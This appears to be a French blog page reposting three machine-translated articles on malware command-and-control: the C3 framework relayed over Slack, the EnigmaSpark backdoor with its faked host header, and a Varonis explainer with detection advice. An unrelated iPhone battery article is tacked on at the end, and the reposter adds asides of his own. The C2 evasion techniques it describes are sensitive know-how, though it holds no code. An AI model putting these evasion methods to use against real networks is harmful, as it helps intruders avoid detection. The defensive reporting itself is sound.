De C2 à C3 : les pirates informatiques deviennent ésotériques lorsqu'ils couvrent des empreintes de pas, appellent chez eux.

 

 De C2 à C3 : les pirates informatiques deviennent ésotériques lorsqu'ils couvrent des empreintes de pas, appellent chez eux.

Facebook Twitter LinkedIn Tumblr Pinterest Reddit
C2 à C3

Pour de nombreux professionnels de l'informatique qui ne se concentrent pas étroitement sur l'espace de sécurité de l'information, un récent blog de FireEye détaillant les techniques utilisées par les affiliés du syndicat de ransomware DarkSide dans l'attaque Colonial Pipeline était le premier qu'ils avaient entendu parler du cadre C3 - une commande et un contrôle personnalisés. plate-forme pour les professionnels de la sécurité offensive qui a été publiée pour la première fois publiquement par F-Secure Labs en septembre 2019.

Un groupe de menaces surnommé « UNC2628 » utilisait le cadre C3 pour masquer leur trafic d'origine, en faisant passer par procuration les communications de commande et de contrôle (C2) via l'API Slack, a déclaré FireEye, ajoutant que « sur la base des autres TTP de cet acteur, ils [également] utilisaient probablement C3 pour brouiller le trafic Cobalt Strike BEACON. (Cobalt Strike est un produit de test de pénétration commercial largement utilisé par les cybercriminels également, qui permet à un attaquant de déployer un agent nommé « Beacon » sur la machine victime avec de nombreuses fonctionnalités coquines.)

Avec C3 capable d'aider les attaquants à utiliser même les imprimantes en réseau comme canal C2, les responsables de la sécurisation des entreprises devraient surveiller de près l'évolution des techniques C2. (F-Secure a quelques conseils sur la recherche de C3, y compris via des requêtes DNS anormales pour les domaines Slack, des processus anormaux, etc. ici.)
C2 à C3 : les chaînes « ésotériques » se généralisent.

Pour les non-initiés, lorsqu'un logiciel malveillant infecte un hôte vulnérable, il initie généralement un canal de commande et de contrôle (C2) avec son créateur qui peut être utilisé pour envoyer des instructions aux appareils compromis, télécharger des charges utiles malveillantes supplémentaires ou être utilisé comme canal bidirectionnel pour exfiltrer les données volées lors de l'attaque.

En effet, comme le note F-Secure, la mise en place de C2 est « sans doute l'une des parties les plus importantes de la chaîne de cyber kill car sans elle, les charges utiles livrées avec succès fonctionnent à l'aveugle, ne peuvent pas fournir de pivot au niveau du réseau et d'interaction en temps quasi réel ». . En conséquence, des organisations bien défendues ont imposé des contrôles de plus en plus stricts sur les types de communications autorisées à partir de leurs systèmes.

(L'importance de l'identification défensive de C2 est reflétée dans deux des colonnes du cadre MITRE ATT&CK : « Command and Control » et « Exfiltration » ; bien qu'aucune ne semble avoir été mise à jour depuis 2019. Quelqu'un nous corrige si nous nous trompons : c'est troublant si n'étaient pas.)

Être capable de détecter les canaux C2, en bref, est une grande partie du livre de jeu de la cybersécurité et généralement un élément important des « indicateurs de compromission » (IOC) signalés après une attaque. (Les hackers de Colonial Pipeline ayant déployé un outil open source avec une « interface facile et intuitive qui permet aux utilisateurs de former des chemins complexes lors de simulations contradictoires » pour cacher leur activité ne devraient pas surprendre : de Cobalt Strike à Mimikatz ou Bloodhound, les outils de sécurité offensifs commerciaux ou open source sont souvent également une partie importante du livre de jeu de la cybercriminalité, et les équipes informatiques doivent en être bien conscientes.)

Une caractéristique clé de C3 est la possibilité d'étendre le réseau à l'aide de vecteurs non traditionnels. Ce réseau peut être composé de divers supports de communication (voir : imprimantes), peut contenir des chemins de routage complexes et permet d'intégrer la redondance à la volée, note le guide C3 de F-Secure.
De C2 à C3 : les attaquants utilisent l'API Slack, Telegram et PowerAutomate de Microsoft pour pirater votre merde.

Le schéma simplifié à gauche donne un exemple simple d'utilisation de C3, avec le relais "Slack" utilisé pour acheminer le trafic pour le relais "Fileshare", qui a une balise CobaltStrike en mémoire. Comme le note F-Secure : « Dans ce cas, l'envoi d'une commande à la balise via Cobalt Strike oblige la passerelle à envoyer un message via Slack. Le relais « Slack » lit ce message, comprend qu'il est destiné à être transmis et écrit le message sur le canal UncShareFile. Enfin, le relais « Fileshare » lit ce message et l'écrit dans la balise SMB. (Les RSSI et leurs équipes doivent être conscients de ce genre de choses…)
Que peuvent faire les défenseurs ?

Bharat Mistry, directeur technique chez Trend Micro, a affirmé à The Stack qu'il voyait des configurations C2 plus sophistiquées devenir populaires à mesure que les organisations surveillaient mieux les canaux réseau pour les protocoles obscurs et les ports non standard, c'est-à-dire en tant qu'indicateurs potentiels de communications malveillantes qui signalent un enfreindre.

Il a déclaré : « Les cybercriminels ont commencé à camoufler leurs canaux C2 et C3 dans des protocoles essentiels standard nécessaires pour communiquer avec des services externes comme http, https, DNS, smtp et des applications couramment utilisées comme Slack et Teams. Un moyen efficace de contrer cela est de penser à déployer une technologie d'inspection approfondie des paquets au niveau des parties critiques de la couche réseau telles que le périmètre pour capturer le trafic Nord-Sud et également entre les utilisateurs et les services qu'ils consomment à partir des serveurs d'applications situés dans le centre de données plus sait communément comme trafic Est-Ouest ou latéral. 

 Mistry a ajouté: «Ces capteurs devraient avoir la capacité de capturer et de réassembler tous les paquets, ce qui donne aux défenseurs la possibilité d'examiner la charge utile à l'intérieur et d'utiliser des capacités avancées telles que l'apprentissage automatique, l'heuristique et l'analyse comportementale pour déterminer si le protocole ou le service est abusé dans d'une certaine manière. 

Les données de ces capteurs peuvent être analysées plus avant dans un lac de données où les analyses peuvent être utilisées pour déterminer les modèles de trafic normaux et anormaux, ce qui donne une meilleure idée de ce qui se passe dans l'environnement. "Mais à mesure que les services et les protocoles évoluent et que nous assistons à un basculement vers le trafic crypté, ce type d'inspection et de surveillance est plus difficile et est encore compliqué par l'utilisation de services cloud." George Glass, responsable de la Threat Intelligence chez Redscan, a déclaré : « Les acteurs de la menace passent une partie importante de leur temps à gérer et à renforcer leur infrastructure C2 pour faciliter les opérations de phishing, de logiciels malveillants et de ransomware à grande échelle. En règle générale, ils utiliseront différents canaux à différentes étapes de leurs attaques, comme lors du déploiement de logiciels malveillants de deuxième étape, de l'accès à distance et de l'exfiltration de données.

 Il a ajouté : « Une tactique courante pour de nombreuses souches de logiciels malveillants consiste à compromettre les sites Web et à les utiliser pour héberger des charges utiles de logiciels malveillants de deuxième étape. Cela implique généralement d'exploiter en masse les systèmes CMS tels que WordPress et de cacher les fichiers malveillants dans le système de fichiers de chaque site, permettant aux chargeurs de logiciels malveillants qu'ils déploient de choisir l'étape suivante parmi un nombre quelconque d'hôtes compromis. Cela permet également aux attaquants de contourner les empreintes digitales et la catégorisation du site Web utilisées par les proxys. 

 Et il n'y a pas que le C3 de F-Secure, a-t-il noté : « Il existe d'innombrables frameworks C2 disponibles qui utilisent différents outils open source, des logiciels de qualité commerciale et des applications telles que Telegram, WhatsApp et Twitter. Les acteurs menaçants qui peuvent cacher leurs communications C2 peuvent rester plus longtemps sur les réseaux cibles, gagnant ainsi une plus grande liberté pour atteindre leurs objectifs. (Avec Cobalt Strike lui-même coûtant 3 500 $ par utilisateur pour une licence d'un an et les cybercriminels – inutile de le dire – désireux d'éviter de s'identifier par le biais de paiements commerciaux, cela peut créer des opportunités pour les défenseurs, a noté Glass. 

Comme il l'a dit : « La plupart des acteurs de la menace utilisez des versions divulguées ou craquées de ce logiciel qui peuvent rendre l'activité plus facile à identifier. ») Tim Wade, directeur technique de l'équipe CTO chez Vectra AI, a ajouté : Nous avons vu des adversaires… [également] utiliser Microsoft PowerAutomate pour créer des workflows malveillants personnalisés, ou déployer de nouveaux droppers en mémoire pour échapper à l'analyse basée sur des fichiers. 

Pour détecter l'activité C2, les équipes de sécurité doivent rechercher les intersections entre les activités autorisées mais suspectes, et les comportements qu'un adversaire adoptera dans le cadre d'une attaque en cours. Il peut s'agir d'examiner des facteurs tels que la manière dont la persistance sera atteinte ou de surveiller les principaux blocages qui doivent être franchis pour que l'attaquant passe de l'accès initial à son objectif final. 

C'est la clé comme souvent, l'établissement du canal C2 n'est que le pari d'ouverture, et les attaquants devront se déplacer latéralement ou élever leurs privilèges avant la fin du jeu, qui consiste généralement à voler des données ou à perturber les opérations. 

 RSSI : commencez à discuter de ce problème avec vos partenaires de sécurité et les professionnels de la sécurité interne. Comme le note Vectra dans un rapport cette semaine sur les détections de menaces pour Microsoft Azure AD et Office 365, « le niveau de compétence et de concentration requis pour contourner proprement les contrôles des points de terminaison est un hommage aux avancées récentes en matière de détection et de réponse des points de terminaison. Cependant, c'est aussi un rappel qu'un adversaire déterminé et sophistiqué sera toujours en mesure de contourner la prévention et les contrôles des points finaux. » Les défenseurs doivent être tout aussi créatifs.

 

REF.:   https://thestack.technology/from-c2-to-c3/

IBM X-Force IRIS a frapper fort: Les pirates cachent la communication Malware C2

IBM X-Force IRIS a frapper fort: Les pirates cachent la communication Malware C2

Les pirates cachent la communication Malware C2 en simulant le trafic du site d'actualités
Par Ionut Ilascu

    18 mars 2020 17:06 0

Un groupe de cyberespionnage actif depuis au moins 2012 a utilisé un outil légitime pour protéger sa porte dérobée des tentatives d'analyse afin d'éviter la détection. Dans leur effort, les pirates ont également utilisé un faux en-tête d'hôte nommé d'après un site d'information connu.

La porte dérobée est désignée par les noms Spark et EnigmaSpark et a été déployée dans une récente campagne de phishing qui semble avoir été l'œuvre du groupe MoleRATs, la division à petit budget du Gaza Cybergang. Il s'agit de l'acteur responsable de l'opération SneakyPastes, détaillée par Kaspersky, qui s'appuyait sur des logiciels malveillants hébergés sur des services de partage gratuits comme GitHub et Pastebin.

Il existe de fortes indications que le groupe a utilisé cette porte dérobée depuis mars 2017, déployant des dizaines de variantes qui ont contacté au moins 15 domaines de commandement et de contrôle.

Des chercheurs de plusieurs cybersécurité ont suivi les campagnes de cet acteur menaçant et ont analysé les logiciels malveillants, les tactiques et l'infrastructure utilisés dans les attaques.
Tactiques d'évasion

L'acteur menaçant a tenté de masquer les signes de compromission à l'aide du logiciel Enigma Protector (on peut trouver sur 01Net)- un outil légitime pour "protéger les fichiers exécutables contre la copie, le piratage, la modification et l'analyse illégaux".

Sur la base des cibles observées et du thème des documents utilisés pour les leurres, cela ressemble à une attaque à motivation politique visant les arabophones intéressés par l'acceptation potentielle par la Palestine du plan de paix.

"Les adversaires utilisant EnigmaSpark se sont probablement appuyés sur l'intérêt important des destinataires pour les événements régionaux ou la peur anticipée suscitée par le contenu falsifié, illustrant comment les adversaires peuvent exploiter les événements géopolitiques en cours pour permettre une cyberactivité malveillante" - IBM X-Force Incident Response and Intelligence Services (IRIS)

La chaîne d'infection menant à l'installation de la porte dérobée EnigmaSpark a commencé avec la livraison d'un document Microsoft Word malveillant. Le fichier est écrit en arabe et invite le destinataire à activer l'édition pour afficher le contenu.

Les chercheurs ont découvert que le document obtient à partir d'un lien Google Drive(donc aucune détection par Google) un modèle Word malveillant intégré avec une macro pour fournir la charge utile finale "runawy.exe".
source : IBM X-Force IRIS

Pour protéger l'opération, les pirates ont ajouté des défenses telles que la protection de la macro avec un mot de passe et l'application d'un schéma de codage base64 sur la porte dérobée, qui était également stockée sur Google Drive.

De plus, le binaire du malware était emballé avec Enigma Protector qui ajoute une certaine résistance aux tentatives de piratage et de craquage.

Une autre précaution de la part des pirates est l'utilisation d'un faux en-tête d'hôte dans la requête HTTP‌ POST qui fournit des informations sur le système de la victime au serveur de commande et de contrôle (C2), qui était « nysura].[com. » Cependant, l'en-tête indique « cnet ].[com' comme destination.
Dénominateur commun

Une enquête X-Force (IRIS) a révélé que l'attaquant a utilisé cette technique avec d'autres binaires. Après avoir décompressé « runawy.exe », ils ont remarqué que le fichier résultant était le même que « blaster.exe », un binaire fourni par un exécutable compressé par Themida, un autre outil légitime qui ajoute une protection contre l'inspection ou la modification d'une application compilée.

Plusieurs fichiers ont été découverts car ils avaient en commun la chaîne unique « S4.4P » et le signataire du certificat cryptographique « tg1678A4 » : Wordeditor.exe, Blaster.exe (la version décompressée de runawy.exe et soundcloud.exe), HelpPane.exe , et taskmanager.exe.

Dans le cas de Blaster, la même astuce avec le faux en-tête d'hôte a été utilisée que dans le cas de « runawy », mais le véritable serveur de destination était différent (« webtutorialz[.]com »).
source : IBM X-Force IRIS
Recherche précédente

Le fichier binaire « runawy.exe », son serveur C2 et la chaîne unique ont déjà été documentés par des chercheurs d'autres sociétés de cybersécurité.

L'équipe Nocturnus de Cybereason a publié le 12 février une analyse technique de la porte dérobée Spark, détaillant les capacités du malware :

    Recueillir des informations sur l'hôte victime
    Cryptez les données collectées et envoyez-les aux attaquants via le protocole HTTP
    Télécharger d'autres charges utiles
    Enregistrez les frappes Enregistrez le son à l'aide du microphone intégré du système
    Exécuter des commandes sur la machine infectée

Au début du mois, Palo Alto Networks a détaillé la même charge utile runawy contenant Enigma qui a été livrée à l'aide d'un document Word les 31 octobre et 2 novembre 2019.

La porte dérobée Spark a été initialement documentée par des chercheurs de la société de cybersécurité Qi An Xin basée à Pékin, avec une version anglaise de la recherche publiée le 14 février 2019.

Les chercheurs de toutes ces entreprises attribuent la porte dérobée Spark au groupe MoleRATs, connu pour utiliser des logiciels malveillants disponibles sur les forums de hackers. Cependant, ils développent également des outils personnalisés, tels que Spark.

REF.:  https://www.bleepingcomputer.com/news/security/hackers-hide-malware-c2-communication-by-faking-news-site-traffic/

Hackers: Qu'est-ce que C2 ou C&C ?

 

 Hackers: Qu'est-ce que C2 ou C&C ?

Infrastructure de commandement et de contrôle expliquée
Par: Robert Grimmick


Dernière mise à jour le 26 avril 2021 

Une cyberattaque réussie ne consiste pas seulement à mettre le pied dans la porte d'une organisation sans méfiance. Pour être réellement utile, l'attaquant doit maintenir la persistance dans l'environnement cible, communiquer avec les appareils infectés ou compromis à l'intérieur du réseau et potentiellement exfiltrer les données sensibles. La clé pour accomplir toutes ces tâches est une infrastructure de commandement et de contrôle robuste ou « C2 ». Qu'est-ce que C2 ? Dans cet article, nous répondrons à cette question et verrons comment les adversaires utilisent ces canaux de communication secrets pour mener des attaques hautement sophistiquées. Nous verrons également comment repérer et se défendre contre les attaques basées sur C2.
Qu'est-ce que C2 ?

L'infrastructure de commandement et de contrôle, également connue sous le nom de C2 ou C&C, est l'ensemble d'outils et de techniques que les attaquants utilisent pour maintenir la communication avec les appareils compromis après l'exploitation initiale. Les mécanismes spécifiques varient considérablement d'une attaque à l'autre, mais C2 consiste généralement en un ou plusieurs canaux de communication secrets entre les appareils d'une organisation victime et une plate-forme contrôlée par l'attaquant. Ces canaux de communication sont utilisés pour envoyer des instructions aux appareils compromis, télécharger des charges utiles malveillantes supplémentaires et rediriger les données volées vers l'adversaire.

C2 se présente sous de nombreuses formes différentes. Au moment de la rédaction, le cadre MITRE ATT&CK répertorie 16 techniques de commandement et de contrôle différentes, chacune avec un certain nombre de sous-techniques qui ont été observées lors de cyberattaques passées. Une stratégie courante consiste à se fondre dans d'autres types de trafic légitime pouvant être utilisés dans l'organisation cible, tels que HTTP/HTTPS ou DNS. Les attaquants peuvent prendre d'autres mesures pour dissimuler leurs rappels C&C, comme l'utilisation du cryptage ou des types inhabituels de codage de données.

code c2

Les plates-formes de commande et de contrôle peuvent être des solutions entièrement personnalisées ou des produits prêts à l'emploi. Les plates-formes populaires utilisées par les criminels et les testeurs d'intrusion incluent Cobalt Strike, Covenant, Powershell Empire et Armitage.

Vous pouvez également entendre un certain nombre de termes à côté de C2 ou C&C :
Qu'est-ce qu'un zombie ?

Un zombie est un ordinateur ou un autre type d'appareil connecté qui a été infecté par une forme de logiciel malveillant et peut être contrôlé à distance par une partie malveillante à l'insu du propriétaire réel ou sans son consentement. Alors que certains virus, chevaux de Troie et autres programmes indésirables effectuent des actions spécifiques après avoir infecté un appareil, de nombreux types de logiciels malveillants existent principalement pour ouvrir une voie vers l'infrastructure C2 de l'attaquant. Ces machines « zombies » peuvent ensuite être piratées pour effectuer un certain nombre de tâches, du relais de courrier indésirable à la participation à des attaques par déni de service distribué (DDoS) à grande échelle.
Qu'est-ce qu'un botnet ?

Un botnet est un ensemble de machines zombies qui sont enrôlées dans un but illicite commun. Cela peut aller de l'extraction de crypto-monnaie à la mise hors ligne d'un site Web via une attaque par déni de service distribué (DDoS). Les botnets sont généralement réunis autour d'une infrastructure C2 commune. Il est également courant que les pirates vendent l'accès aux botnets à d'autres criminels dans le cadre d'une sorte d'« attaque en tant que service ».
Qu'est-ce que le balisage ?

Le balisage fait référence au processus par lequel un appareil infecté téléphone à l'infrastructure C2 d'un attaquant pour rechercher des instructions ou des charges utiles supplémentaires, souvent à intervalles réguliers. Pour éviter d'être détectés, certains types de balises malveillantes émettent des balises à intervalles aléatoires ou peuvent rester en veille pendant un certain temps avant de téléphoner à la maison.
Que peuvent accomplir les pirates avec une infrastructure de commandement et de contrôle ?

Objectifs du hacker c2

 La plupart des organisations ont des défenses périmétriques assez efficaces qui rendent difficile pour un adversaire d'initier une connexion du monde extérieur dans le réseau de l'organisation sans être détecté. Cependant, la communication sortante n'est souvent pas aussi fortement surveillée ou restreinte. Cela signifie que les logiciels malveillants introduits via un canal différent – ​​par exemple un e-mail de phishing ou un site Web compromis – peuvent souvent établir un canal de communication dans la direction sortante qui serait autrement impossible. Avec ce canal ouvert, un pirate peut effectuer des actions supplémentaires, telles que :
Se déplacer latéralement dans une organisation de victimes

Une fois qu'un attaquant a pris pied, il cherchera généralement à se déplacer latéralement dans toute l'organisation, en utilisant ses canaux C2 pour renvoyer des informations sur d'autres hôtes qui peuvent être vulnérables ou mal configurés. La première machine compromise n'est peut-être pas une cible précieuse, mais elle sert de rampe de lancement pour accéder aux parties les plus sensibles du réseau. Ce processus peut être répété plusieurs fois jusqu'à ce que l'attaquant accède à une cible de grande valeur comme un serveur de fichiers ou un contrôleur de domaine.
Attaques en plusieurs étapes

Les cyberattaques les plus complexes sont souvent composées de plusieurs étapes distinctes. Souvent, l'infection initiale consiste en un « dropper ou un téléchargeur qui rappelle l'infrastructure C2 de l'adversaire et télécharge des charges utiles malveillantes supplémentaires. Cette architecture modulaire permet à un attaquant de mener des campagnes à la fois largement distribuées et très ciblées. Le compte-gouttes(dropper) peut infecter des milliers d'organisations, permettant à l'attaquant d'être sélectif et de créer des logiciels malveillants personnalisés de deuxième étape pour les cibles les plus lucratives. Ce modèle permet également toute une industrie décentralisée de la cybercriminalité. Un groupe d'accès initial peut vendre l'accès à une cible principale comme une banque ou un hôpital à un gang de ransomware, par exemple.
Exfiltrer les données

Les canaux C2 sont souvent bidirectionnels, ce qui signifie qu'un attaquant peut télécharger ou « exfiltrer » des données de l'environnement cible en plus d'envoyer des instructions aux hôtes compromis. Les données volées peuvent être des documents militaires classifiés, des numéros de carte de crédit ou des informations personnelles, selon l'organisation de la victime. De plus en plus, les gangs de ransomware utilisent l'exfiltration de données comme tactique supplémentaire pour extorquer leurs cibles ; même si l'organisation peut récupérer des données à partir de sauvegardes, les criminels menaceront de divulguer des informations volées et potentiellement embarrassantes.
Autres utilisations

Comme indiqué précédemment, les botnets sont fréquemment utilisés pour lancer des attaques DDoS contre des sites Web et d'autres services. Les instructions sur les sites à attaquer sont fournies via C2. D'autres types d'instructions peuvent également être envoyées aux machines zombies via C2. Par exemple, de grands botnets de crypto mining ont été identifiés. Des utilisations encore plus exotiques ont été théorisées, allant de l'utilisation de commandes C2 pour perturber les élections(Donald Trump peut-etre) ou manipuler les marchés de l'énergie.
Modèles de commandement et de contrôle

Bien qu'il existe une grande variété d'options pour la mise en œuvre de C2, l'architecture entre les logiciels malveillants et la plate-forme C2 ressemblera généralement à l'un des modèles suivants :
Centralisé

Un modèle de commande et de contrôle centralisé fonctionne un peu comme la relation client-serveur traditionnelle. Un « client » malveillant téléphonera à un serveur C2 et vérifiera les instructions. En pratique, l'infrastructure côté serveur d'un attaquant est souvent beaucoup plus complexe qu'un serveur unique et peut inclure des redirecteurs, des équilibreurs de charge et des mesures de défense pour détecter les chercheurs en sécurité et les forces de l'ordre. Les services de cloud public et les réseaux de diffusion de contenu (CDN) sont fréquemment utilisés pour héberger ou masquer l'activité C2. Il est également courant que les pirates informatiques compromettent des sites Web légitimes et les utilisent pour héberger des serveurs de commande et de contrôle à l'insu du propriétaire.

L'activité C2 est souvent découverte assez rapidement et les domaines et serveurs associés à une campagne peuvent être supprimés dans les heures suivant leur première utilisation. Pour lutter contre cela, les logiciels malveillants modernes sont souvent codés avec une liste de nombreux serveurs C2 différents à essayer d'atteindre. Les attaques les plus sophistiquées introduisent des couches supplémentaires d'obscurcissement. Des logiciels malveillants ont été observés en train de récupérer une liste de serveurs C2 à partir des coordonnées GPS intégrées dans les photos et des commentaires sur Instagram.
Peer-to-Peer (P2P)

Dans un modèle P2P C&C, les instructions de commande et de contrôle sont fournies de manière décentralisée, les membres d'un botnet relayant les messages entre eux. Certains des robots peuvent toujours fonctionner comme des serveurs, mais il n'y a pas de nœud central ou « maître ». Cela rend la perturbation beaucoup plus difficile qu'un modèle centralisé, mais peut également compliquer la tâche de l'attaquant pour envoyer des instructions à l'ensemble du botnet. Les réseaux P2P sont parfois utilisés comme mécanisme de secours en cas de perturbation du canal C2 principal.
Hors bande et aléatoire

Un certain nombre de techniques inhabituelles ont été observées pour donner des instructions aux hôtes infectés. Les pirates informatiques ont largement utilisé les plateformes de médias sociaux en tant que plateformes C2 non conventionnelles, car elles sont rarement bloquées. Un projet appelé Twittor vise à fournir une plate-forme de commande et de contrôle entièrement fonctionnelle en utilisant uniquement des messages directs sur Twitter. Des pirates informatiques ont également été observés en train d'utiliser Gmail, des salles de discussion IRC et même Pinterest pour envoyer des messages C&C à des hôtes compromis. Il a également été émis l'hypothèse que l'infrastructure de commande et de contrôle pourrait être entièrement aléatoire, avec un attaquant analysant de larges pans d'Internet dans l'espoir de trouver un hôte infecté.
Détection et prévention du trafic de commandement et de contrôle

comment empêcher le piratage c2

Le trafic C2 peut être notoirement difficile à détecter, car les attaquants font de grands efforts pour éviter d'être remarqués. Cependant, il existe une formidable opportunité pour les défenseurs, car perturber C2 peut empêcher une infection par un logiciel malveillant de se transformer en un incident plus grave comme une violation de données. En fait, de nombreuses cyberattaques à grande échelle ont été initialement découvertes lorsque les chercheurs ont remarqué une activité C2. Voici quelques techniques générales pour détecter et arrêter le trafic de commande et de contrôle dans votre propre réseau :
Surveiller et filtrer le trafic sortant

De nombreuses organisations accordent peu d'attention au trafic sortant de leur réseau, se concentrant plutôt sur les menaces contenues dans le trafic entrant. Ce manque de sensibilisation facilite les activités de commandement et de contrôle d'un attaquant. Soigneusement des règles de pare-feu de sortie conçues peuvent aider à entraver la capacité d'un adversaire à ouvrir des canaux de communication secrets. Par exemple, limiter les requêtes DNS sortantes aux seuls serveurs contrôlés par l'organisation peut réduire la menace du tunnelage DNS. Les proxys peuvent être utilisés pour inspecter le trafic Web sortant, mais les utilisateurs doivent veiller à configurer l'inspection SSL/TLS, car les pirates ont adopté le cryptage avec le reste du Web. Les services de filtrage DNS peuvent également être utilisés pour empêcher les rappels C2 vers des domaines suspects ou nouvellement enregistrés.
Surveillez les balises

Les balises peuvent être un signe révélateur d'une activité de commandement et de contrôle au sein de votre réseau, mais elles sont souvent difficiles à repérer. La plupart des solutions IDS/IPS prendront en charge les balises associées à des frameworks standard comme Metasploit et Cobalt Strike, mais celles-ci peuvent facilement être personnalisées par les attaquants pour rendre la détection beaucoup plus difficile. Pour une analyse plus approfondie du trafic réseau (NTA), un outil comme RITA peut être utilisé. Dans certains cas, les équipes de chasse aux menaces iront jusqu'à inspecter manuellement les vidages de paquets à l'aide d'un outil comme Wireshark ou tcpdump.
Journaliser et inspecter

enregistrer et inspecter le code

La collecte de fichiers journaux à partir d'autant de sources que possible est vitale lors de la recherche de signes de trafic de commandement et de contrôle. Souvent, une analyse approfondie est nécessaire pour faire la distinction entre le trafic C2 et les applications légitimes. Les analystes de sécurité peuvent avoir besoin de rechercher des modèles inhabituels, d'examiner les charges utiles de requêtes HTTPS ou DNS apparemment bénignes et d'effectuer d'autres types d'analyses statistiques. Plus le volume d'informations avec lequel l'analyste ou le chasseur de menaces doit travailler est important, mieux c'est. La journalisation à distance et les solutions SIEM peuvent vous aider dans cette tâche.
Corréler les données de plusieurs sources

Tout l'intérêt du maintien d'une infrastructure de commande et de contrôle est d'effectuer une action spécifique comme accéder à des fichiers importants ou infecter plus d'hôtes. La chasse aux activités C&C du point de vue des données et du réseau augmente la probabilité de découvrir des cyberattaques bien camouflées. C'est exactement l'approche adoptée par Varonis Edge, vous offrant la visibilité approfondie requise pour tout repérer, des menaces internes aux groupes APT(hackers).
 

Conclusion

L'infrastructure de commandement et de contrôle est essentielle pour les attaquants et représente une opportunité pour les défenseurs. Le blocage du trafic C&C ou le démantèlement de l'infrastructure C2 d'un adversaire peut mettre un terme à une cyberattaque. La lutte contre le C2 ne devrait jamais être le seul objectif d'une organisation et devrait faire partie d'un programme de sécurité de l'information plus large qui comprend de bonnes pratiques de « cyberhygiène », une formation de sensibilisation à la sécurité pour les employés et des politiques et procédures bien pensées. Ces mesures peuvent grandement contribuer à atténuer la menace posée par l'infrastructure de commandement et de contrôle.
 

REF.:   Robert Grimmick

https://www.varonis.com/blog/what-is-c2

 

 

Même à plat, ton iPhone a une petite réserve d’énergie pour te dépanner

Publié le 5 janvier 2022 par Jean-Marc Meyrat

Zut, plus de batterie. C’est la catastrophe ! Un iPhone à plat, c’est tout un attirail qui disparait.

Plus d’appareil photo, de GPS, de téléphone, ni même de carte de transport, voire de clés. À moins que…

Depuis quelques générations, les iPhone intègrent une « réserve d’énergie » qui fait perdurer une poignée de fonctions quand la batterie est vide. Voici comment cette réserve méconnue peut te dépanner.

Une réserve depuis les iPhone XS/XR

La réserve d’énergie a fait son apparition sur les iPhone XS et XR sortis en 2018 et est depuis intégrée à chaque modèle, y compris l’iPhone SE de 2e génération. Toutes les gammes suivantes en bénéficient donc:

• iPhone XS;
• iPhone XR;
• iPhone SE 2e génération;
• iPhone 11;
• iPhone 12;
• iPhone 13.

Apple a ajouté cette nouveauté de manière très discrète, en ne communiquant quasiment pas dessus au début. Il fallait se rendre sur la fiche technique des iPhone XS/XR pour voir la mention « Cartes Express avec réserve d’énergie » sans plus d’information.

Les démontages n’ont pas débusqué de petite batterie supplémentaire dans les iPhone, la réserve d’énergie est constituée dans la batterie principale. C’est comme la réserve d’une voiture : il n’y a pas de second réservoir dans lequel on aurait mis une petite quantité de carburant, il s’agit toujours du réservoir principal dans lequel on fixe une limite à partir de laquelle le carburant restant est considéré comme la réserve.

Alors qu’ils ont pourtant la même batterie, l’iPhone 8 n’a pas de réserve d’énergie tandis que l’iPhone SE 2020 en a une. Qu’est-ce qui les différencie dès lors? Le système sur puce, certes (un A13 au lieu d’un A11), mais c’est peut-être le contrôleur NFC qui fait surtout la différence. Depuis le modèle NXP PN7120 (100VB27) apparu dans l’iPhone XS, le contrôleur NFC de l’iPhone a une unité de gestion de l’énergie qui lui permet de se connecter directement à la batterie et d’avoir des modes de fonctionnement autonomes quand l’appareil est éteint, ce que n’avaient apparemment pas les précédents.

Une réserve pour terminer son trajet

Si Apple est demeurée discrète sur cette nouveauté dans les premiers temps, c’est sûrement parce que son rôle restait très limité. La réserve d’énergie servait initialement à deux fonctions: les cartes de transport et les cartes d’étudiant enregistrées dans Wallet. Ces deux types de cartes ont un point commun: on peut s’en servir sans avoir à ouvrir une app ni même déverrouiller l’appareil, il suffit d’approcher son iPhone du lecteur NFC pour valider son titre de transport ou son identité. C’est ce qu’Apple appelle le mode « express ».

Au Japon, l’iPhone est un pass de transports en commun simple comme bonjour

Imagine, tu voyages au Japon, à Londres ou dans une autre zone où le mode Transport express est pris en charge. À force de prendre des photos et d’utiliser Plans, ton iPhone tombe en rade de batterie plus vite que prévu. Es-tu condamné à acheter un ticket de métro à un distributeur avec du liquide? Non.

Grâce à la réserve d’énergie de ton iPhone, tu peux continuer d’utiliser ta carte de Transport express (Suica ou Pasmo au Japon, une carte Apple Pay sélectionnée comme carte de Transport express à Londres). L’iPhone apparait comme complètement à plat, il est impossible de le rallumer, mais la carte de transport fonctionne bien pendant encore un petit moment. Seule une icône de batterie rouge accompagnée d’un bref message indique que des cartes restent utilisables.

La réserve d’énergie n’est pas pensée pour que tu traverses le Japon d’un bout à l’autre avec ton iPhone éteint, elle est uniquement là pour dépanner. D’après Apple, elle permet de prolonger la disponibilité des cartes express jusqu’à cinq heures, un laps de temps suffisant pour terminer son trajet et partir à la recherche d’un chargeur.

Une réserve pour ouvrir les portes

À la faveur de la prise en charge de clés numériques dans l’app Wallet (renommée « Cartes » en français) dans iOS 15, Apple parle plus volontiers de « mode Express » que de « Transport express ». Ces clés de voiture, de maison ou d’hôtel fonctionnent en effet rien qu’en approchant son iPhone de la serrure connectée, de manière « express » donc. Et comme les cartes de transport, les clés stockées dans Wallet continuent de jouer leur rôle quand l’iPhone bascule sur sa réserve d’énergie.

Même avec un iPhone à sec, on a encore une chance de pouvoir rentrer dans sa chambre d’hôtel au petit matin. Inutile de dire que cette réserve va devenir une roue de secours de plus en plus primordiale à mesure que l’on stockera davantage de clés et de cartes dans son iPhone.

Le sursis offert par la réserve d’énergie est commun à tous les types de cartes ou de clés configurées en mode Express : jusqu’à cinq heures. En appuyant sur le bouton latéral de l’iPhone, on peut s’assurer que la réserve d’énergie nous secourt, mais Apple prévient que l’utilisation répétée de ce bouton peut considérablement réduire la réserve disponible. Mieux vaut ne pas en abuser.

Autre précision importante à connaître : le mode Express fonctionne sur la réserve uniquement quand l’iPhone n’a plus de batterie. Si tu éteins toi-même ton iPhone (pour préserver la batterie justement), la réserve ne sera pas exploitée pour les cartes et les clés de Wallet. Pourquoi? Peut-être par mesure de sécurité et sûrement pour garder de l’énergie pour la nouvelle fonction introduite dans iOS 15.

Localise ton iPhone même éteint

Depuis iOS 15 en effet, même s’il est éteint, ton iPhone continue à communiquer avec les autres appareils du réseau Localiser afin de te permettre de le retrouver. À l’inverse des cartes en mode Express, cela fonctionne même si tu éteins toi-même ton iPhone… ou qu’un voleur l’éteint à ta place.

Cette fonction a justement été pensée pour ce cas de figure, et elle marche, comme l’a témoigné récemment un lecteur qui a pu retrouver, avec l’aide de la police, son iPhone volé qui avait été éteint.

